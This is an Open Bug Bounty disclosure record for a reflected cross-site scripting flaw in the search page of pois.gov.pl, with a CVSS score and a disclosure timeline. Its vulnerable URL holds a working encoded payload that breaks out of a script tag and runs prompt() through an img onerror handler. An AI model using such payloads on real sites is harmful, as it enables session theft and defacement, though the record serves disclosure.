pois.gov.pl XSS vulnerability

2017-11-07T04:50:00
ID OBB:397816
Type openbugbounty
Reporter OmniGooch
Modified 2018-02-05T04:50:00

Description

Open Bug Bounty ID: OBB-397816

Description | Value
--- | ---
Affected Website: | pois.gov.pl
Vulnerable Application: | Custom Code
Vulnerability Type: | XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score: | 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide: | OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.pois.gov.pl/strony/szukaj/?param=%3c%2fscript%3e%3cimg+src%3dx+onerror%3dprompt(%2fXSSPOSED%2f)%3e%2522%253E%253C%2fscript%253E%253Cimg%2520src%3dhttp%3a%2f%2fi.dailymail.co.uk%2fi%2fpix%2f2016%2f08%2f11%2f17%2f371D509C00000578-3734919-Speaking_as_she_showcases_her_incredibly_toned_body_in_a_new_bea-a-15_1470931763257.jpg%2520onerror%3dprompt(%2fXSSPOSED%2f)%253E#/param=%3C%2Fscript%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(%2FXSSPOSED%2F)%3E%2522%253E%253C%2Fscript%253E%253Cimg%2520src%3Dhttp%3A%2F%2Fi.dailymail.co.uk%2Fi%2Fpix%2F2016%2F08%2F11%2F17%2F371D509C00000578-3734919-Speaking_as_she_showcases_her_incredibly_toned_body_in_a_new_bea-a-15_1470931763257.jpg%2520onerror%3Dprompt(%2FXSSPOSED%2F)%253E/rodzaj=0/domyslne=1

Coordinated Disclosure Timeline

Description | Value
--- | ---
Vulnerability Reported: | 7 November, 2017 04:50 GMT
Vulnerability Verified: | 7 November, 2017 07:27 GMT
Website Operator Notified: | 7 November, 2017 07:27 GMT
Vulnerability Published: | 7 November, 2017 07:27 GMT [without any technical details]
Public Disclosure: | 5 February, 2018 04:50 GMT